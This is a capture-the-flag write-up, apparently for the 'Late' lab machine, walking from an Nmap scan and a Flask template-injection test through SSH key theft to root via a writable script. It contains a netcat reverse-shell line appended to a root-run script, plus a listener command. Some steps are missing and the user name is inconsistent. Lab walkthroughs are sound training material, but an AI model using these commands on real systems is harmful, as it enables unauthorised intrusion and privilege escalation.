Let's start with enumeration with Nmap: nmap -sS -A -sC -sV -T5 -oN scan.txt 10.129.132.140
Nmap scan report for 10.129.132.140
Host is up (0.082s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 02:5e:29:0e:a3:af:4e:72:9d:a4:fe:0d:cb:5d:83:07 (RSA)
| 256 41:e1:fe:03:a5:c7:97:c4:d5:16:77:f3:41:0c:e9:fb (ECDSA)
|_ 256 28:39:46:98:17:1e:46:1a:1e:a1:ab:3b:9a:57:70:48 (ED25519)
80/tcp open http nginx 1.14.0 (Ubuntu)
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: Late - Best online image tools
Aggressive OS guesses: Linux 4.15 - 5.6 (95%), Linux 5.3 - 5.4 (95%), Linux 2.6.32 (95%), Linux 5.0 - 5.3 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 5.0 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 3306/tcp)
HOP RTT ADDRESS
1 83.66 ms 10.10.14.1
2 83.65 ms 10.129.132.140
Port 22 & 80 are open. HTTP is hosted on Port 80
Let's visit that in our browser
Port 80
By seeing the website there isn't that much.
I found one link in the source code
To visit that page, we have to add images.late.htb to our HOST
after editing /etc/hosts and adding our machine's IP we are good to do.
images.late.htb
This page converts any image to text like on OCR. So, let's upload an image and let's check the response
The output 👇
<p>If you want to turn an image into a text document, you came to the right place.
</p>
Here we can see that it has extracted the text from the image.
This image-to-text only detects some of the fonts I am currently using - ms word - font - bahnschrift landscape if this does not work try changing the fonts and size
Here we can see in the heading its written "flask" (information disclosure). From my previous experiences most of the flask-based application are vulnerable to SSTI
Let's try to upload an image containing SSTI payload {{7*7}} and check the response
Now, copy the above Private Key to our machine removing the <p> and </p>
chmod 600 id_rsa
ssh svc_scc@$ip -i id_rsa
We are in!
Privilege Escalation
scp -i id_rsa linpeas.sh svc_acc@$ip:.
Let's run linpeas.sh
chmod +x linpeas.sh
./linpeas.sh
we got some interesting files with root privileges /usr/local/sbin
Let's check ssh-alert.sh
Looks like this running whenever a user gets connected using the ssh
So, we can modify this file and get the root flag
pspy64
Now re-login in some other terminal with ssh .Here we can see that ssh-alert.sh is running with UID=0 which means that is running with root permissions.
We can get the root flag with two ways.
Method 1 - With rev shell
Let's check if we have nc on the machine or not.
Okay we have nc . We can just append the file contents of ssh-alert.sh to get a rev shell
we cannot edit ssh-slert.sh as we don't have any permission to edit that. So, we can only append that file using >>
echo -n 'nc -e sh {ip} 9004' >> /usr/local/sbin/ssh-alert.sh
Now, setup a listener on another terminal nc -lnvp 9004
Re-login with a SSH in the svc_acc to trigger our script.
Boom! now we got a Rev shell on our listener, and we are Root!
Method 2 - Copying root.txt to our unprivileged user
we cannot edit ssh-slert.sh as we don't have any permission to edit that. So, we can only append that file using >>
We can just use the cat command to read the root.txt and append that to our svc_acc without any rev shell
Create a flag.txt file under /home/svc_acc/
touch /home/svc_acc/flag.txt
2. append our cat command to read the /root/root.txt to ssh-alert.sh
